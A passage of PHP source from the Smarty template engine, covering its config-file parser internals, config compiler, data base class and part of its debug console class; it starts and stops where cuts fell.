                    $yyruleno = $yyact - self::YYNSTATE;
                    $this->yyidx -= self::$yyRuleInfo[ $yyruleno ][ 1 ];
                    $nextstate = $this->yy_find_reduce_action(
                        $this->yystack[ $this->yyidx ]->stateno,
                        self::$yyRuleInfo[ $yyruleno ][ 0 ]
                    );
                    if (isset($res2[ $nextstate ][ $token ])) {
                        if ($res2[ $nextstate ][ $token ]) {
                            $this->yyidx = $yyidx;
                            $this->yystack = $stack;
                            return true;
                        }
                    } else {
                        if ($res2[ $nextstate ][ $token ] =
                            (isset(self::$yyExpectedTokens[ $nextstate ]) &&
                             in_array($token, self::$yyExpectedTokens[ $nextstate ], true))) {
                            $this->yyidx = $yyidx;
                            $this->yystack = $stack;
                            return true;
                        }
                    }
                    if ($nextstate < self::YYNSTATE) {
                        // we need to shift a non-terminal
                        $this->yyidx++;
                        $x = new TPC_yyStackEntry;
                        $x->stateno = $nextstate;
                        $x->major = self::$yyRuleInfo[ $yyruleno ][ 0 ];
                        $this->yystack[ $this->yyidx ] = $x;
                        continue 2;
                    } elseif ($nextstate === self::YYNSTATE + self::YYNRULE + 1) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        if (!$token) {
                            // end of input: this is valid
                            return true;
                        }
                        // the last token was just ignored, we can't accept
                        // by ignoring input, this is in essence ignoring a
                        // syntax error!
                        return false;
                    } elseif ($nextstate === self::YY_NO_ACTION) {
                        $this->yyidx = $yyidx;
                        $this->yystack = $stack;
                        // input accepted, but not shifted (I guess)
                        return true;
                    } else {
                        $yyact = $nextstate;
                    }
                } while (true);
            }
            break;
        } while (true);
        $this->yyidx = $yyidx;
        $this->yystack = $stack;
        return true;
    }

    public function yy_find_shift_action($iLookAhead)
    {
        $stateno = $this->yystack[ $this->yyidx ]->stateno;
        /* if ($this->yyidx < 0) return self::YY_NO_ACTION;  */
        if (!isset(self::$yy_shift_ofst[ $stateno ])) {
            // no shift actions
            return self::$yy_default[ $stateno ];
        }
        $i = self::$yy_shift_ofst[ $stateno ];
        if ($i === self::YY_SHIFT_USE_DFLT) {
            return self::$yy_default[ $stateno ];
        }
        if ($iLookAhead === self::YYNOCODE) {
            return self::YY_NO_ACTION;
        }
        $i += $iLookAhead;
        if ($i < 0 || $i >= self::YY_SZ_ACTTAB ||
            self::$yy_lookahead[ $i ] != $iLookAhead) {
            if (count(self::$yyFallback) && $iLookAhead < count(self::$yyFallback)
                && ($iFallback = self::$yyFallback[ $iLookAhead ]) != 0) {
                if ($this->yyTraceFILE) {
                    fwrite($this->yyTraceFILE, $this->yyTracePrompt . 'FALLBACK ' .
                                               $this->yyTokenName[ $iLookAhead ] . ' => ' .
                                               $this->yyTokenName[ $iFallback ] . "\n");
                }
                return $this->yy_find_shift_action($iFallback);
            }
            return self::$yy_default[ $stateno ];
        } else {
            return self::$yy_action[ $i ];
        }
    }

    public function yy_find_reduce_action($stateno, $iLookAhead)
    {
        /* $stateno = $this->yystack[$this->yyidx]->stateno; */
        if (!isset(self::$yy_reduce_ofst[ $stateno ])) {
            return self::$yy_default[ $stateno ];
        }
        $i = self::$yy_reduce_ofst[ $stateno ];
        if ($i === self::YY_REDUCE_USE_DFLT) {
            return self::$yy_default[ $stateno ];
        }
        if ($iLookAhead === self::YYNOCODE) {
            return self::YY_NO_ACTION;
        }
        $i += $iLookAhead;
        if ($i < 0 || $i >= self::YY_SZ_ACTTAB ||
            self::$yy_lookahead[ $i ] != $iLookAhead) {
            return self::$yy_default[ $stateno ];
        } else {
            return self::$yy_action[ $i ];
        }
    }

    public function yy_shift($yyNewState, $yyMajor, $yypMinor)
    {
        $this->yyidx++;
        if ($this->yyidx >= self::YYSTACKDEPTH) {
            $this->yyidx--;
            if ($this->yyTraceFILE) {
                fprintf($this->yyTraceFILE, "%sStack Overflow!\n", $this->yyTracePrompt);
            }
            while ($this->yyidx >= 0) {
                $this->yy_pop_parser_stack();
            }
            // line 239 "../smarty/lexer/smarty_internal_configfileparser.y"
            $this->internalError = true;
            $this->compiler->trigger_config_file_error('Stack overflow in configfile parser');
            return;
        }
        $yytos = new TPC_yyStackEntry;
        $yytos->stateno = $yyNewState;
        $yytos->major = $yyMajor;
        $yytos->minor = $yypMinor;
        $this->yystack[] = $yytos;
        if ($this->yyTraceFILE && $this->yyidx > 0) {
            fprintf(
                $this->yyTraceFILE,
                "%sShift %d\n",
                $this->yyTracePrompt,
                $yyNewState
            );
            fprintf($this->yyTraceFILE, "%sStack:", $this->yyTracePrompt);
            for ($i = 1; $i <= $this->yyidx; $i++) {
                fprintf(
                    $this->yyTraceFILE,
                    " %s",
                    $this->yyTokenName[ $this->yystack[ $i ]->major ]
                );
            }
            fwrite($this->yyTraceFILE, "\n");
        }
    }

    public function yy_r0()
    {
        $this->_retvalue = null;
    }

    public function yy_r1()
    {
        $this->add_global_vars($this->yystack[ $this->yyidx + 0 ]->minor);
        $this->_retvalue = null;
    }

    public function yy_r4()
    {
        $this->add_section_vars($this->yystack[ $this->yyidx + -3 ]->minor, $this->yystack[ $this->yyidx + 0 ]->minor);
        $this->_retvalue = null;
    }

    // line 245 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r5()
    {
        if ($this->configReadHidden) {
            $this->add_section_vars(
                $this->yystack[ $this->yyidx + -3 ]->minor,
                $this->yystack[ $this->yyidx + 0 ]->minor
            );
        }
        $this->_retvalue = null;
    }

    // line 250 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r6()
    {
        $this->_retvalue = $this->yystack[ $this->yyidx + -1 ]->minor;
    }

    // line 264 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r7()
    {
        $this->_retvalue =
            array_merge($this->yystack[ $this->yyidx + -1 ]->minor, array($this->yystack[ $this->yyidx + 0 ]->minor));
    }

    // line 269 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r8()
    {
        $this->_retvalue = array();
    }

    // line 277 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r9()
    {
        $this->_retvalue =
            array(
                'key'   => $this->yystack[ $this->yyidx + -2 ]->minor,
                'value' => $this->yystack[ $this->yyidx + 0 ]->minor
            );
    }

    // line 281 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r10()
    {
        $this->_retvalue = (float)$this->yystack[ $this->yyidx + 0 ]->minor;
    }

    // line 285 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r11()
    {
        $this->_retvalue = (int)$this->yystack[ $this->yyidx + 0 ]->minor;
    }

    // line 291 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r12()
    {
        $this->_retvalue = $this->parse_bool($this->yystack[ $this->yyidx + 0 ]->minor);
    }

    // line 296 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r13()
    {
        $this->_retvalue = self::parse_single_quoted_string($this->yystack[ $this->yyidx + 0 ]->minor);
    }

    // line 300 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r14()
    {
        $this->_retvalue = self::parse_double_quoted_string($this->yystack[ $this->yyidx + 0 ]->minor);
    }

    // line 304 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r15()
    {
        $this->_retvalue = self::parse_tripple_double_quoted_string($this->yystack[ $this->yyidx + -1 ]->minor);
    }

    // line 308 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r16()
    {
        $this->_retvalue = '';
    }

    // line 312 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_r17()
    {
        $this->_retvalue = $this->yystack[ $this->yyidx + 0 ]->minor;
    }

    // line 316 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_reduce($yyruleno)
    {
        if ($this->yyTraceFILE && $yyruleno >= 0
            && $yyruleno < count(self::$yyRuleName)) {
            fprintf(
                $this->yyTraceFILE,
                "%sReduce (%d) [%s].\n",
                $this->yyTracePrompt,
                $yyruleno,
                self::$yyRuleName[ $yyruleno ]
            );
        }
        $this->_retvalue = $yy_lefthand_side = null;
        if (isset(self::$yyReduceMap[ $yyruleno ])) {
            // call the action
            $this->_retvalue = null;
            $this->{'yy_r' . self::$yyReduceMap[ $yyruleno ]}();
            $yy_lefthand_side = $this->_retvalue;
        }
        $yygoto = self::$yyRuleInfo[ $yyruleno ][ 0 ];
        $yysize = self::$yyRuleInfo[ $yyruleno ][ 1 ];
        $this->yyidx -= $yysize;
        for ($i = $yysize; $i; $i--) {
            // pop all of the right-hand side parameters
            array_pop($this->yystack);
        }
        $yyact = $this->yy_find_reduce_action($this->yystack[ $this->yyidx ]->stateno, $yygoto);
        if ($yyact < self::YYNSTATE) {
            if (!$this->yyTraceFILE && $yysize) {
                $this->yyidx++;
                $x = new TPC_yyStackEntry;
                $x->stateno = $yyact;
                $x->major = $yygoto;
                $x->minor = $yy_lefthand_side;
                $this->yystack[ $this->yyidx ] = $x;
            } else {
                $this->yy_shift($yyact, $yygoto, $yy_lefthand_side);
            }
        } elseif ($yyact === self::YYNSTATE + self::YYNRULE + 1) {
            $this->yy_accept();
        }
    }

    // line 320 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_parse_failed()
    {
        if ($this->yyTraceFILE) {
            fprintf($this->yyTraceFILE, "%sFail!\n", $this->yyTracePrompt);
        }
        while ($this->yyidx >= 0) {
            $this->yy_pop_parser_stack();
        }
    }

    // line 324 "../smarty/lexer/smarty_internal_configfileparser.y"
    public function yy_syntax_error($yymajor, $TOKEN)
    {
        // line 232 "../smarty/lexer/smarty_internal_configfileparser.y"
        $this->internalError = true;
        $this->yymajor = $yymajor;
        $this->compiler->trigger_config_file_error();
    }

    public function yy_accept()
    {
        if ($this->yyTraceFILE) {
            fprintf($this->yyTraceFILE, "%sAccept!\n", $this->yyTracePrompt);
        }
        while ($this->yyidx >= 0) {
            $this->yy_pop_parser_stack();
        }
        // line 225 "../smarty/lexer/smarty_internal_configfileparser.y"
        $this->successful = !$this->internalError;
        $this->internalError = false;
        $this->retvalue = $this->_retvalue;
    }

    public function doParse($yymajor, $yytokenvalue)
    {
        $yyerrorhit = 0;   /* True if yymajor has invoked an error */
        if ($this->yyidx === null || $this->yyidx < 0) {
            $this->yyidx = 0;
            $this->yyerrcnt = -1;
            $x = new TPC_yyStackEntry;
            $x->stateno = 0;
            $x->major = 0;
            $this->yystack = array();
            $this->yystack[] = $x;
        }
        $yyendofinput = ($yymajor == 0);
        if ($this->yyTraceFILE) {
            fprintf(
                $this->yyTraceFILE,
                "%sInput %s\n",
                $this->yyTracePrompt,
                $this->yyTokenName[ $yymajor ]
            );
        }
        do {
            $yyact = $this->yy_find_shift_action($yymajor);
            if ($yymajor < self::YYERRORSYMBOL &&
                !$this->yy_is_expected_token($yymajor)) {
                // force a syntax error
                $yyact = self::YY_ERROR_ACTION;
            }
            if ($yyact < self::YYNSTATE) {
                $this->yy_shift($yyact, $yymajor, $yytokenvalue);
                $this->yyerrcnt--;
                if ($yyendofinput && $this->yyidx >= 0) {
                    $yymajor = 0;
                } else {
                    $yymajor = self::YYNOCODE;
                }
            } elseif ($yyact < self::YYNSTATE + self::YYNRULE) {
                $this->yy_reduce($yyact - self::YYNSTATE);
            } elseif ($yyact === self::YY_ERROR_ACTION) {
                if ($this->yyTraceFILE) {
                    fprintf(
                        $this->yyTraceFILE,
                        "%sSyntax Error!\n",
                        $this->yyTracePrompt
                    );
                }
                if (self::YYERRORSYMBOL) {
                    if ($this->yyerrcnt < 0) {
                        $this->yy_syntax_error($yymajor, $yytokenvalue);
                    }
                    $yymx = $this->yystack[ $this->yyidx ]->major;
                    if ($yymx === self::YYERRORSYMBOL || $yyerrorhit) {
                        if ($this->yyTraceFILE) {
                            fprintf(
                                $this->yyTraceFILE,
                                "%sDiscard input token %s\n",
                                $this->yyTracePrompt,
                                $this->yyTokenName[ $yymajor ]
                            );
                        }
                        $this->yy_destructor($yymajor, $yytokenvalue);
                        $yymajor = self::YYNOCODE;
                    } else {
                        while ($this->yyidx >= 0 &&
                               $yymx !== self::YYERRORSYMBOL &&
                               ($yyact = $this->yy_find_shift_action(self::YYERRORSYMBOL)) >= self::YYNSTATE
                        ) {
                            $this->yy_pop_parser_stack();
                        }
                        if ($this->yyidx < 0 || $yymajor == 0) {
                            $this->yy_destructor($yymajor, $yytokenvalue);
                            $this->yy_parse_failed();
                            $yymajor = self::YYNOCODE;
                        } elseif ($yymx !== self::YYERRORSYMBOL) {
                            $u2 = 0;
                            $this->yy_shift($yyact, self::YYERRORSYMBOL, $u2);
                        }
                    }
                    $this->yyerrcnt = 3;
                    $yyerrorhit = 1;
                } else {
                    if ($this->yyerrcnt <= 0) {
                        $this->yy_syntax_error($yymajor, $yytokenvalue);
                    }
                    $this->yyerrcnt = 3;
                    $this->yy_destructor($yymajor, $yytokenvalue);
                    if ($yyendofinput) {
                        $this->yy_parse_failed();
                    }
                    $yymajor = self::YYNOCODE;
                }
            } else {
                $this->yy_accept();
                $yymajor = self::YYNOCODE;
            }
        } while ($yymajor !== self::YYNOCODE && $this->yyidx >= 0);
    }

    /**
     * parse optional boolean keywords
     *
     * @param string $str
     *
     * @return bool
     */
    private function parse_bool($str)
    {
        $str = strtolower($str);
        if (in_array($str, array('on', 'yes', 'true'))) {
            $res = true;
        } else {
            $res = false;
        }
        return $res;
    }

    /**
     * set a config variable in target array
     *
     * @param array $var
     * @param array $target_array
     */
    private function set_var(array $var, array &$target_array)
    {
        $key = $var[ 'key' ];
        $value = $var[ 'value' ];
        if ($this->configOverwrite || !isset($target_array[ 'vars' ][ $key ])) {
            $target_array[ 'vars' ][ $key ] = $value;
        } else {
            settype($target_array[ 'vars' ][ $key ], 'array');
            $target_array[ 'vars' ][ $key ][] = $value;
        }
    }

    /**
     * add config variable to global vars
     *
     * @param array $vars
     */
    private function add_global_vars(array $vars)
    {
        if (!isset($this->compiler->config_data[ 'vars' ])) {
            $this->compiler->config_data[ 'vars' ] = array();
        }
        foreach ($vars as $var) {
            $this->set_var($var, $this->compiler->config_data);
        }
    }

    /**
     * add config variable to section
     *
     * @param string $section_name
     * @param array  $vars
     */
    private function add_section_vars($section_name, array $vars)
    {
        if (!isset($this->compiler->config_data[ 'sections' ][ $section_name ][ 'vars' ])) {
            $this->compiler->config_data[ 'sections' ][ $section_name ][ 'vars' ] = array();
        }
        foreach ($vars as $var) {
            $this->set_var($var, $this->compiler->config_data[ 'sections' ][ $section_name ]);
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Config File Compiler
 * This is the config file compiler class. It calls the lexer and parser to
 * perform the compiling.
 *
 * @package    Smarty
 * @subpackage Config
 * @author     Uwe Tews
 */

/**
 * Main config file compiler class
 *
 * @package    Smarty
 * @subpackage Config
 */
class Smarty_Internal_Config_File_Compiler
{
    /**
     * Lexer class name
     *
     * @var string
     */
    public $lexer_class;

    /**
     * Parser class name
     *
     * @var string
     */
    public $parser_class;

    /**
     * Lexer object
     *
     * @var object
     */
    public $lex;

    /**
     * Parser object
     *
     * @var object
     */
    public $parser;

    /**
     * Smarty object
     *
     * @var Smarty object
     */
    public $smarty;

    /**
     * Smarty object
     *
     * @var Smarty_Internal_Template object
     */
    public $template;

    /**
     * Compiled config data sections and variables
     *
     * @var array
     */
    public $config_data = array();

    /**
     * compiled config data must always be written
     *
     * @var bool
     */
    public $write_compiled_code = true;

    /**
     * Initialize compiler
     *
     * @param string $lexer_class  class name
     * @param string $parser_class class name
     * @param Smarty $smarty       global instance
     */
    public function __construct($lexer_class, $parser_class, Smarty $smarty)
    {
        $this->smarty = $smarty;
        // get required plugins
        $this->lexer_class = $lexer_class;
        $this->parser_class = $parser_class;
        $this->smarty = $smarty;
        $this->config_data[ 'sections' ] = array();
        $this->config_data[ 'vars' ] = array();
    }

    /**
     * Method to compile Smarty config source.
     *
     * @param Smarty_Internal_Template $template
     *
     * @return bool true if compiling succeeded, false if it failed
     * @throws \SmartyException
     */
    public function compileTemplate(Smarty_Internal_Template $template)
    {
        $this->template = $template;
        $this->template->compiled->file_dependency[ $this->template->source->uid ] =
            array(
                $this->template->source->filepath,
                $this->template->source->getTimeStamp(),
                $this->template->source->type
            );
        if ($this->smarty->debugging) {
            if (!isset($this->smarty->_debug)) {
                $this->smarty->_debug = new Smarty_Internal_Debug();
            }
            $this->smarty->_debug->start_compile($this->template);
        }
        // init the lexer/parser to compile the config file
        /* @var Smarty_Internal_ConfigFileLexer $this->lex */
        $this->lex = new $this->lexer_class(
            str_replace(
                array(
                    "\r\n",
                    "\r"
                ),
                "\n",
                $template->source->getContent()
            ) . "\n",
            $this
        );
        /* @var Smarty_Internal_ConfigFileParser $this->parser */
        $this->parser = new $this->parser_class($this->lex, $this);
        if (function_exists('mb_internal_encoding')
            && function_exists('ini_get')
            && ((int)ini_get('mbstring.func_overload')) & 2
        ) {
            $mbEncoding = mb_internal_encoding();
            mb_internal_encoding('ASCII');
        } else {
            $mbEncoding = null;
        }
        if ($this->smarty->_parserdebug) {
            $this->parser->PrintTrace();
        }
        // get tokens from lexer and parse them
        while ($this->lex->yylex()) {
            if ($this->smarty->_parserdebug) {
                echo "<br>Parsing  {$this->parser->yyTokenName[$this->lex->token]} Token {$this->lex->value} Line {$this->lex->line} \n";
            }
            $this->parser->doParse($this->lex->token, $this->lex->value);
        }
        // finish parsing process
        $this->parser->doParse(0, 0);
        if ($mbEncoding) {
            mb_internal_encoding($mbEncoding);
        }
        if ($this->smarty->debugging) {
            $this->smarty->_debug->end_compile($this->template);
        }
        // template header code
        $template_header = sprintf(
            "<?php /* Smarty version %s, created on %s\n         compiled from '%s' */ ?>\n",
            Smarty::SMARTY_VERSION,
            date("Y-m-d H:i:s"),
            str_replace('*/', '* /' , $this->template->source->filepath)
        );
        $code = '<?php $_smarty_tpl->smarty->ext->configLoad->_loadConfigVars($_smarty_tpl, ' .
                var_export($this->config_data, true) . '); ?>';
        return $template_header . $this->template->smarty->ext->_codeFrame->create($this->template, $code);
    }

    /**
     * display compiler error messages without dying
     * If parameter $args is empty it is a parser detected syntax error.
     * In this case the parser is called to obtain information about expected tokens.
     * If parameter $args contains a string this is used as error message
     *
     * @param string $args individual error message or null
     *
     * @throws SmartyCompilerException
     */
    public function trigger_config_file_error($args = null)
    {
        // get config source line which has error
        $line = $this->lex->line;
        if (isset($args)) {
            // $line--;
        }
        $match = preg_split("/\n/", $this->lex->data);
        $error_text =
            "Syntax error in config file '{$this->template->source->filepath}' on line {$line} '{$match[$line - 1]}' ";
        if (isset($args)) {
            // individual error message
            $error_text .= $args;
        } else {
            // expected token from parser
            foreach ($this->parser->yy_get_expected_tokens($this->parser->yymajor) as $token) {
                $exp_token = $this->parser->yyTokenName[ $token ];
                if (isset($this->lex->smarty_token_names[ $exp_token ])) {
                    // token type from lexer
                    $expect[] = '"' . $this->lex->smarty_token_names[ $exp_token ] . '"';
                } else {
                    // otherwise internal token name
                    $expect[] = $this->parser->yyTokenName[ $token ];
                }
            }
            // output parser error message
            $error_text .= ' - Unexpected "' . $this->lex->value . '", expected one of: ' . implode(' , ', $expect);
        }
        throw new SmartyCompilerException($error_text);
    }
}
<?php
/**
 * Smarty Internal Plugin Data
 * This file contains the basic classes and methods for template and variable creation
 *
 * @package    Smarty
 * @subpackage Template
 * @author     Uwe Tews
 */

/**
 * Base class with template and variable methods
 *
 * @package    Smarty
 * @subpackage Template
 *
 * @property int    $scope
 * @property Smarty $smarty
 * The following methods will be dynamically loaded by the extension handler when they are called.
 * They are located in a corresponding Smarty_Internal_Method_xxxx class
 *
 * @method mixed _getConfigVariable(string $varName, bool $errorEnable = true)
 * @method mixed getConfigVariable(string $varName, bool $errorEnable = true)
 * @method mixed getConfigVars(string $varName = null, bool $searchParents = true)
 * @method mixed getGlobal(string $varName = null)
 * @method mixed getStreamVariable(string $variable)
 * @method Smarty_Internal_Data clearAssign(mixed $tpl_var)
 * @method Smarty_Internal_Data clearAllAssign()
 * @method Smarty_Internal_Data clearConfig(string $varName = null)
 * @method Smarty_Internal_Data configLoad(string $config_file, mixed $sections = null, string $scope = 'local')
 */
abstract class Smarty_Internal_Data
{
    /**
     * This object type (Smarty = 1, template = 2, data = 4)
     *
     * @var int
     */
    public $_objType = 4;

    /**
     * name of class used for templates
     *
     * @var string
     */
    public $template_class = 'Smarty_Internal_Template';

    /**
     * template variables
     *
     * @var Smarty_Variable[]
     */
    public $tpl_vars = array();

    /**
     * parent template (if any)
     *
     * @var Smarty|Smarty_Internal_Template|Smarty_Data
     */
    public $parent = null;

    /**
     * configuration settings
     *
     * @var string[]
     */
    public $config_vars = array();

    /**
     * extension handler
     *
     * @var Smarty_Internal_Extension_Handler
     */
    public $ext = null;

    /**
     * Smarty_Internal_Data constructor.
     *
     * Install extension handler
     */
    public function __construct()
    {
        $this->ext = new Smarty_Internal_Extension_Handler();
        $this->ext->objType = $this->_objType;
    }

    /**
     * assigns a Smarty variable
     *
     * @param array|string $tpl_var the template variable name(s)
     * @param mixed        $value   the value to assign
     * @param boolean      $nocache if true any output of this variable will be not cached
     *
     * @return Smarty_Internal_Data current Smarty_Internal_Data (or Smarty or Smarty_Internal_Template) instance for
     *                              chaining
     */
    public function assign($tpl_var, $value = null, $nocache = false)
    {
        if (is_array($tpl_var)) {
            foreach ($tpl_var as $_key => $_val) {
                $this->assign($_key, $_val, $nocache);
            }
        } else {
            if ($tpl_var !== '') {
                if ($this->_objType === 2) {
                    /**
                     *
                     *
                     * @var Smarty_Internal_Template $this
                     */
                    $this->_assignInScope($tpl_var, $value, $nocache);
                } else {
                    $this->tpl_vars[ $tpl_var ] = new Smarty_Variable($value, $nocache);
                }
            }
        }
        return $this;
    }

    /**
     * appends values to template variables
     *
     * @api  Smarty::append()
     * @link https://www.smarty.net/docs/en/api.append.tpl
     *
     * @param array|string $tpl_var the template variable name(s)
     * @param mixed        $value   the value to append
     * @param bool         $merge   flag if array elements shall be merged
     * @param bool         $nocache if true any output of this variable will
     *                              be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function append($tpl_var, $value = null, $merge = false, $nocache = false)
    {
        return $this->ext->append->append($this, $tpl_var, $value, $merge, $nocache);
    }

    /**
     * assigns a global Smarty variable
     *
     * @param string  $varName the global variable name
     * @param mixed   $value   the value to assign
     * @param boolean $nocache if true any output of this variable will be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function assignGlobal($varName, $value = null, $nocache = false)
    {
        return $this->ext->assignGlobal->assignGlobal($this, $varName, $value, $nocache);
    }

    /**
     * appends values to template variables by reference
     *
     * @param string  $tpl_var the template variable name
     * @param mixed   &$value  the referenced value to append
     * @param boolean $merge   flag if array elements shall be merged
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function appendByRef($tpl_var, &$value, $merge = false)
    {
        return $this->ext->appendByRef->appendByRef($this, $tpl_var, $value, $merge);
    }

    /**
     * assigns values to template variables by reference
     *
     * @param string  $tpl_var the template variable name
     * @param         $value
     * @param boolean $nocache if true any output of this variable will be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function assignByRef($tpl_var, &$value, $nocache = false)
    {
        return $this->ext->assignByRef->assignByRef($this, $tpl_var, $value, $nocache);
    }

    /**
     * Returns a single or all template variables
     *
     * @api  Smarty::getTemplateVars()
     * @link https://www.smarty.net/docs/en/api.get.template.vars.tpl
     *
     * @param string                                                  $varName       variable name or null
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $_ptr          optional pointer to data object
     * @param bool                                                    $searchParents include parent templates?
     *
     * @return mixed variable value or or array of variables
     */
    public function getTemplateVars($varName = null, ?Smarty_Internal_Data $_ptr = null, $searchParents = true)
    {
        return $this->ext->getTemplateVars->getTemplateVars($this, $varName, $_ptr, $searchParents);
    }

    /**
     * Follow the parent chain an merge template and config variables
     *
     * @param \Smarty_Internal_Data|null $data
     */
    public function _mergeVars(?Smarty_Internal_Data $data = null)
    {
        if (isset($data)) {
            if (!empty($this->tpl_vars)) {
                $data->tpl_vars = array_merge($this->tpl_vars, $data->tpl_vars);
            }
            if (!empty($this->config_vars)) {
                $data->config_vars = array_merge($this->config_vars, $data->config_vars);
            }
        } else {
            $data = $this;
        }
        if (isset($this->parent)) {
            $this->parent->_mergeVars($data);
        }
    }

    /**
     * Return true if this instance is a Data obj
     *
     * @return bool
     */
    public function _isDataObj()
    {
        return $this->_objType === 4;
    }

    /**
     * Return true if this instance is a template obj
     *
     * @return bool
     */
    public function _isTplObj()
    {
        return $this->_objType === 2;
    }

    /**
     * Return true if this instance is a Smarty obj
     *
     * @return bool
     */
    public function _isSmartyObj()
    {
        return $this->_objType === 1;
    }

    /**
     * Get Smarty object
     *
     * @return Smarty
     */
    public function _getSmartyObj()
    {
        return $this->smarty;
    }

    /**
     * Handle unknown class methods
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @return mixed
     */
    public function __call($name, $args)
    {
        return $this->ext->_callExternalMethod($this, $name, $args);
    }
}
<?php
/**
 * Smarty Internal Plugin Debug
 * Class to collect data for the Smarty Debugging Console
 *
 * @package    Smarty
 * @subpackage Debug
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Debug Class
 *
 * @package    Smarty
 * @subpackage Debug
 */
class Smarty_Internal_Debug extends Smarty_Internal_Data
{
    /**
     * template data
     *
     * @var array
     */
    public $template_data = array();

    /**
     * List of uid's which shall be ignored
     *
     * @var array
     */
    public $ignore_uid = array();

    /**
     * Index of display() and fetch() calls
     *
     * @var int
     */
    public $index = 0;

    /**
     * Counter for window offset
     *
     * @var int
     */
    public $offset = 0;

    /**
     * Start logging template
     *
     * @param \Smarty_Internal_Template $template template
     * @param null                      $mode     true: display   false: fetch  null: subtemplate
     */
    public function start_template(Smarty_Internal_Template $template, $mode = null)
    {
        if (isset($mode) && !$template->_isSubTpl()) {
            $this->index++;
            $this->offset++;
            $this->template_data[ $this->index ] = null;
        }
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'start_template_time' ] = microtime(true);
    }

    /**
     * End logging of cache time
     *
     * @param \Smarty_Internal_Template $template cached template
     */
    public function end_template(Smarty_Internal_Template $template)
    {
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'total_time' ] +=
            microtime(true) - $this->template_data[ $this->index ][ $key ][ 'start_template_time' ];
        //$this->template_data[$this->index][$key]['properties'] = $template->properties;
    }

    /**
     * Start logging of compile time
     *
     * @param \Smarty_Internal_Template $template
     */
    public function start_compile(Smarty_Internal_Template $template)
    {
        static $_is_stringy = array('string' => true, 'eval' => true);
        if (!empty($template->compiler->trace_uid)) {
            $key = $template->compiler->trace_uid;
            if (!isset($this->template_data[ $this->index ][ $key ])) {
                if (isset($_is_stringy[ $template->source->type ])) {
                    $this->template_data[ $this->index ][ $key ][ 'name' ] =
                        '\'' . substr($template->source->name, 0, 25) . '...\'';
                } else {
                    $this->template_data[ $this->index ][ $key ][ 'name' ] = $template->source->filepath;
                }
                $this->template_data[ $this->index ][ $key ][ 'compile_time' ] = 0;
                $this->template_data[ $this->index ][ $key ][ 'render_time' ] = 0;
                $this->template_data[ $this->index ][ $key ][ 'cache_time' ] = 0;
            }
        } else {
            if (isset($this->ignore_uid[ $template->source->uid ])) {
                return;
            }
            $key = $this->get_key($template);
        }
        $this->template_data[ $this->index ][ $key ][ 'start_time' ] = microtime(true);
    }

    /**
     * End logging of compile time
     *
     * @param \Smarty_Internal_Template $template
     */
    public function end_compile(Smarty_Internal_Template $template)
    {
        if (!empty($template->compiler->trace_uid)) {
            $key = $template->compiler->trace_uid;
        } else {
            if (isset($this->ignore_uid[ $template->source->uid ])) {
                return;
            }
            $key = $this->get_key($template);
        }
        $this->template_data[ $this->index ][ $key ][ 'compile_time' ] +=
            microtime(true) - $this->template_data[ $this->index ][ $key ][ 'start_time' ];
    }

    /**
     * Start logging of render time
     *
     * @param \Smarty_Internal_Template $template
     */
    public function start_render(Smarty_Internal_Template $template)
    {
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'start_time' ] = microtime(true);
    }

    /**
     * End logging of compile time
     *
     * @param \Smarty_Internal_Template $template
     */
    public function end_render(Smarty_Internal_Template $template)
    {
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'render_time' ] +=
            microtime(true) - $this->template_data[ $this->index ][ $key ][ 'start_time' ];
    }

    /**
     * Start logging of cache time
     *
     * @param \Smarty_Internal_Template $template cached template
     */
    public function start_cache(Smarty_Internal_Template $template)
    {
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'start_time' ] = microtime(true);
    }

    /**
     * End logging of cache time
     *
     * @param \Smarty_Internal_Template $template cached template
     */
    public function end_cache(Smarty_Internal_Template $template)
    {
        $key = $this->get_key($template);
        $this->template_data[ $this->index ][ $key ][ 'cache_time' ] +=
            microtime(true) - $this->template_data[ $this->index ][ $key ][ 'start_time' ];
    }

    /**
     * Register template object
     *
     * @param \Smarty_Internal_Template $template cached template
     */
    public function register_template(Smarty_Internal_Template $template)
    {
    }

    /**
     * Register data object
     *
     * @param \Smarty_Data $data data object
     */
    public static function register_data(Smarty_Data $data)
    {
    }

    /**
     * Opens a window for the Smarty Debugging Console and display the data
     *
     * @param Smarty_Internal_Template|Smarty $obj object to debug
     * @param bool                            $full
     *
     * @throws \Exception
     * @throws \SmartyException
     */
    public function display_debug($obj, $full = false)
    {
        if (!$full) {
            $this->offset++;
            $savedIndex = $this->index;
            $this->index = 9999;
        }
        $smarty = $obj->_getSmartyObj();
        // create fresh instance of smarty for displaying the debug console
        // to avoid problems if the application did overload the Smarty class
        $debObj = new Smarty();
        // copy the working dirs from application
        $debObj->setCompileDir($smarty->getCompileDir());
